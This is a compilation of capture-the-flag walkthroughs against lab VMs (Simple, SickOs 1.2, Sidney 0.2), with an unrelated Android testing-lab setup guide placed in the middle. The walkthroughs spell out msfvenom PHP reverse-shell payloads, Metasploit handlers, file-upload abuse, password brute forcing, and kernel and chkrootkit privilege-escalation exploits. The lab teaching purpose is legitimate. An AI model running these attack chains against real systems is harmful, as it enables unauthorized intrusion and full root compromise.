First Download Simple VM from here
Breaching Methodology:
- Network Scanning (Netdiscover, Nmap)
- Enumerate File upload vulnerability (searchsploit)
- Generate PHP Backdoor (Msfvenom)
- Upload and execute a backdoor
- Reverse connection (Metasploit)
- Import python one-liner for proper TTY shell
- Kernel Privilege Escalation
- Get Root access and capture the flag.
[size=small]netdiscover
1
netdiscover[/size]
Our target is 192.168.1.106
Then move on to scanning our target with nmap
[size=small]nmap -A 192.168.1.106
1
nmap -A 192.168.1.106[/size]
On scanning, you will find that port 80 is open which will be pointing toward cutenews. So we will now open it on our browser.
Now we can see that our target is using CuteNews v.2.0.3
[size=small]searchsploit cutenews 2.0.3
1
searchsploit cutenews 2.0.3[/size]
the instructions to upload the file. The first thing it tells us to register on the website in order to have the power to upload a file.
To register it will ask you to give your username and password as shown below.
When you complete the steps of registering them, it will redirect you to the following window:
Now we need to upload the file so make it with the help of msfvenom following command:
[size=small]msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.1.108 lport=4444 -f raw
1
msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.1.108 lport=4444 -f raw[/size]
On the other hand run multi/handler inside Metasploit framework.
Copy the code from <?php to die() and save it in a file with .php extension. To upload the file login from the username with which you have just registered and then click on personal options give your username and mail ID and then browse the file that you want to upload and then click on save.
Now we will use dirb to find the directories. And for that type:
[size=small]dirb http://192.168.1.106
1
dirb http://192.168.1.106[/size]
It will show you /uploads directory. This is the directory where your file will be uploaded. Open the directory in the browser and you find your uploaded file there.
Meanwhile, return to the Metasploit terminal and wait for the meterpreter session by exploiting multi handler.
[size=small]msf use exploit/multi/handler
msf exploit(multi/handler) set payload php/meterpreter/reverse_tcp
msf exploit(multi/handler) set lhost 192.168.1.108
msf exploit(multi/handler) set lport 4444
msf exploit(multi/handler) exploit
1
2
3
4
5
msf use exploit/multi/handler
msf exploit(multi/handler) set payload php/meterpreter/reverse_tcp
msf exploit(multi/handler) set lhost 192.168.1.108
msf exploit(multi/handler) set lport 4444
msf exploit(multi/handler) exploit[/size]
From given below image you can observe Meterpreter session 1. But the task is not finished yet, still, we need to penetrate more for privilege escalation.
[size=small]shell
1
shell[/size]
Then to access proper TTY shell we had import python one line script by typing following:
[size=small]python -c 'import pty;pty.spawn("/bin/bash")'
1
python -c 'import pty;pty.spawn("/bin/bash")'[/size]
[size=small]cd /tmp
1
cd /tmp[/size]
Using sysinfo command I found machine architecture that helps me to find out a kernel exploit for privilege escalation and with help of Google search, we got an exploit 36746.
As we know that version of the kernel is vulnerable, consequently we will download its exploit by the command as given below:
[size=small]wget https//www.exploit-db.com/download/36746.c
1
wget https//www.exploit-db.com/download/36746.c[/size]
This will install the exploit successfully. Moving forward, we will compile the file:
[size=small]gcc 36746.c -o access -static
1
gcc 36746.c -o access -static[/size]
Now we will open the file access:
[size=small]./access
1
./access[/size]
Then type id to know the users and then type:
[size=small]cd /root
1
cd /root[/size]
and will take you into the /root. Further type:
[size=small]ls
1
ls[/size]
It will list the files and one of those files will be flag.txt. To read the flag type:
[size=small]cat flag.txt
1
cat flag.txt[/size]
In this walkthrough, I will explain how to solve the SickOs 1.2 challenge. This OS is second in the following series from SickOs and is independent of the prior releases, the scope of the challenge is to gain highest privileges on the system. This CTF gives a clear analogy of how hacking strategies can be performed on a network to compromise it in a safe environment.
First Download Sick OS from Here
Breaching Methodology:
- Network Scanning (Netdiscover, Nmap)
- Directory brute-force (dirb)
- Find HTTP Options: PUT (curl)
- Generate PHP Backdoor (Msfvenom)
- Install Poster (Firefox plug-in)
- Upload and execute a backdoor
- Reverse connection (Metasploit)
- Privilege Escalation (cron job)
- Import python one-liner for proper TTY shell
- Get Root access and capture the flag.
So, first let us find our target by using :
[size=small]netdiscover
1
netdiscover[/size]
Our target is 192.168.1.109 Further we will apply a nmap scan:
[size=small]nmap -A 192.168.1.109
1
nmap -A 192.168.1.109[/size]
As you can see that port 80 is open that means we can open this IP in the browser. Why not do that?
Opening the IP in the browser will show us the above image which is of no use. You can try and look into the page source but unfortunately, you will find nothing there. That is why we will use dirb and to find the directories. And for that type:
[size=small]dirb http://192.168.1.109
1
dirb http://192.168.1.109[/size]
As a result, you can see we have found our directory i.e. test Open it in the browser as well.
[size=small]192.168.1.109/test/
1
192.168.1.109/test/[/size]
It will show you the list of directories. So let us try and explore test directory via curl.
[size=small]curl -v -X OPTIONS http://192.168.1.109/test[/SIZE]
1
curl -v -X OPTIONS http://192.168.1.109/test[/SIZE][/size]
This exploring will show you that PUT is allowed that means you can upload any file through it.
So, prepare the malicious file that you would upload with msfvenom:
[size=small]msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.1.108 lport=443 -f raw
1
msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.1.108 lport=443 -f raw
On the other hand run multi/handler inside Metasploit framework.
Copy the code from <?php to die(); and paste it to a text file with the extension .php for example shell.php and ready to upload the said file.
Now to upload your .php file we will use the add-on poster. Click on the tools from the menu bar. And then click on Poster from the drop-down menu. The following dialog box will open. Here, browse the file that you will upload and click on PUT option.
It will show you that the file is uploaded
And you can see the same on your browser that you file will be uploaded (as in our case the file is shell.php) now run the file you just uploaded.
Meanwhile, return to the Metasploit terminal and wait for the meterpreter session by exploiting multi handler.
[size=small]msf use exploit/multi/handler
msf exploit(multi/handler) set payload php/meterpreter/reverse_tcp
msf exploit(multi/handler) set lhost 192.168.1.108
msf exploit(multi/handler) set lport 443
msf exploit(multi/handler) exploit
1
2
3
4
5
msf use exploit/multi/handler
msf exploit(multi/handler) set payload php/meterpreter/reverse_tcp
msf exploit(multi/handler) set lhost 192.168.1.108
msf exploit(multi/handler) set lport 443
msf exploit(multi/handler) exploit
From given below image you can observe Meterpreter session 1. But the task is not finished yet, still, we need to penetrate more for privilege escalation.
Then I check for cron jobs from inside /etc/crontab and here found some schedule jobs.
Moving further type the following to explore more and find something to be exploitable:
[size=small]cat /etc/crontab
1
cat /etc/crontab[/size]
The above command will give you the list of the files. On observing you can see that there is chkrootkit. Some of its version is exploitable therefore we will check its version and for that type:
[size=small]chkrootkit -V
1
chkrootkit -V[/size]
It will show you the version which is 0.49
With help of Google, we came to know that Metasploit contains an exploit for chkrootkit exploitation. After entering following command as shown in the given image to load exploit/unix/local/chkrootkit module then set session 1 and arbitrary lport such as 8080 and run the module.
This will give another session, as you can see we have spawned command shellid it will show uid=0 as root.
[size=small]id
cd /root
1
2
id
cd /root[/size]
And to see the list of files in /root type :
[size=small]ls -lsa
1
ls -lsa[/size]
In the list you will see that there is a text file and read that file type :
[size=small]cat 7d83aaa2bf93d8040f3f22ec6ad9d5a.txt
1
cat 7d83aaa2bf93d8040f3f22ec6ad9d5a.txt[/size]
So first we have to setup an environment for android application testing.
Requirements for android penetration testing:
- Virtual Box
- Santoku OS which come with preinstalled SDKs.
- GenyMotion for creating Android Virtual Device ( AVD)
So first download Santoku OS from here. Santoku OS is built especially for Mobile penetration testing and forensic investigation. Santoku comes with pre-installed SDKs and other utilities. There is a bunch of forensic tools also like firmware flashing tools for multiple vendors, some other forensic scripts for enumerating app details, etc.
After downloading Santoku open Virtual Box and create a new virtual machine for it.
Now select RAM for Santoku VM, recommended is 786MB but I took 2GB, you can select according to your own need and click NEXT.
Here select the size of the hard disk as you wish and then create VM.
Now for installing Santoku tou our created VM right click on Santoku VM and go to settings Storage then select the empty disk after click on disk icon just in front of optical drive in the attribute section and then browse and select the downloaded santoku iso file and click Okay.
Now installation process will begin, select your preferred language then click on continue after click on Install now.
Now santoku will start copying files and installing. Now sit back and wait for few minutes after that it will restart.
Now you can download Genymotion from here .
Basically, Genymotion is a relatively fast Android emulator which comes with pre-configured Android with OpenGL hardware acceleration suitable for application testing.
After installing Genymotion, go to https://www.genymotion.com/account/create/ and create a free account there and verify your email ID. Then come back to genymotion desktop software and login there using newly created account credentials.
Select the device according to your need and click next. Then in this sections your review the configuration of android mobile device and finally create virtual device.
Here you can see I created 2 virtual devices. Now select the devices and launch it.
Here is our Android Virtual Device.
To test our application for any kind of vulnerability we need Android SDK because in our testing phase we will be going to use ADB (Android Debugger Bridge) command line almost every time. And Android SDK is preinstalled in Santoku OS. So, now we are going to connect santoku to our Android Virtual Device.
Fists check the IP of Android Virtual Device.
adb connect <IP of Android Virtual Device>
You can check whether device is connected or not by typing:
adb devices
So here we can see that list is showing that 1 device connected.
And here you can also run shell to enter in android mobile by typing:
adb shell
So here creating penetration testing lab for android application is completed now stay tuned for next article on actual android app penetration testing and hacking.
Today we will take up a boot2root challenge by Nightmares. We will work on Sidney: 0.2 made by Nightmares.https://www.vulnhub.com/entry/sidney-02,149/
Breaching Methodologies:
- Network Scanning (Nmap, netdiscover)
- webserver enumeration (view source)
- Directory brute-force (dirb)
- Generate own Dictionary (crunch)
- Login into the admin console
- Generate PHP Backdoor (Msfvenom)
- Upload and execute a backdoor
- Reverse connection (Metasploit)
- Kernel privilege escalation (Metasploit)
- Gain root access
- Penetrate for flag.zip
- Access Ram and finished the task
[size=small]netdiscover
1
netdiscover[/size]
Now that we have located our target IP i.e. 192.168.1.103, our next step is to scan it.
[size=small]nmap -A -p- 192.168.1.103
1
nmap -A -p- 192.168.1.103[/size]
Upon scanning we know that port number 80 is open that means this IP will open in the browser so let us try and do that.
Then we decided to look into its page source.
So we opened it in the browser (192.168.1.103/commorode64) and to our luck, we found another page.
As you will read the page source you will come to know that username is robhubbard and going further you will find some hints about the password i.e. :
- the password is in lowercase
- the password has 3 letters and four digits
- and it is related to c=64 sound chip
Then we run dirb for web directory brute-force attack and here it has shown so many directories. But I was interested in index.php and decide to explore it.
So we opened it and as you can see it is asking for username and password. Now, we already know what is the username, we just have to find the password.
Getting the above hints about the password, we first decided to look up the c=64 sound chip on Wikipedia. And we found:
MOS is the first three digits of the password.
Now everything falls on the last four digits of the password and finds that we used crunch command.
[size=small]crunch 7 7 -t mos%%%% -o /root/Desktop/dict.txt
1
crunch 7 7 -t mos%%%% -o /root/Desktop/dict.txt[/size]
Crunch will generate your dictionary file.
And then apply dictionary attack using Burp Suite and then it will result in showing you the password as shown below:
Now on the index.php page enter the username and password. The following page will open and on this page, you have to upload a malicious php file.
Entering the password you will login to the following page:
Now to generate the said php open the terminal in your Kali and type:
[size=small]msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.1.108 lport=4444 -f raw
1
msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.1.108 lport=4444 -f raw[/size]
Simultaneously start multi handler inside Metasploit framework.
Copy the code from <?php to die() and save it in a file with .php extension. Now upload this file by browsing it on the webpage.
Meanwhile, return to the Metasploit terminal and wait for the meterpreter session by exploiting multi handler.
[size=small]msf use exploit/multi/handler
msf exploit(multi/handler) set payload php/meterpreter/reverse_tcp
msf exploit(multi/handler) set lhost 192.168.1.108
msf exploit(multi/handler) set lport 4444
msf exploit(multi/handler) exploit
1
2
3
4
5
msf use exploit/multi/handler
msf exploit(multi/handler) set payload php/meterpreter/reverse_tcp
msf exploit(multi/handler) set lhost 192.168.1.108
msf exploit(multi/handler) set lport 4444
msf exploit(multi/handler) exploit[/size]
From given below image you can observe meterpreter session 1. But the task is not finished yet, still, we need to penetrate more for privilege escalation.
By executing sysinfokernel 4.4, and with help of this, we found Metasploit exploit for kernel privilege escalation. Further type following command:
[size=small]use exploit/linux/local/bpf_priv_esc
msf exploit(linux/local/bpf_priv_esc) > set session 1
msf exploit(linux/local/bpf_priv_esc) > set lhost 192.168.1.108
msf exploit(linux/local/bpf_priv_esc) > set lport 8888
msf exploit(linux/local/bpf_priv_esc) > exploit
1
2
3
4
5
use exploit/linux/local/bpf_priv_esc
msf exploit(linux/local/bpf_priv_esc) > set session 1
msf exploit(linux/local/bpf_priv_esc) > set lhost 192.168.1.108
msf exploit(linux/local/bpf_priv_esc) > set lport 8888
msf exploit(linux/local/bpf_priv_esc) > exploit[/size]
[size=small]cd /root
ls
1
2
cd /root
ls[/size]
[size=small]download hint.gif /root/Desktop/
1
download hint.gif /root/Desktop/[/size]
So when we opened hint.gif it has shown below image and I was unable to take-out hint from their conversation.
Further, I execute the following command:
[size=small]cd .commodor64
ls
cd .miami
ls
cd vice
ls
1
2
3
4
5
6
cd .commodor64
ls
cd .miami
ls
cd vice
ls[/size]
[size=small]download flag.zip /root/Desktop/
1
download flag.zip /root/Desktop/[/size]
We will apply dictionary attack using rockyou.txt so for this the command is:
[size=small]fcrackzip -vuD -p /usr/share/wordlists/rockyou.txt flag.zip
1
fcrackzip -vuD -p /usr/share/wordlists/rockyou.txt flag.zip[/size]
And yes, at last, you have the password. So now unzip the flag.zip by typing:
[size=small]unzip flag.zip
1
unzip flag.zip[/size]
Then it will ask you the password. Enter the recently obtained password here.
And YAY!!!!! We have captured the Flag!!! Enjoy with it.
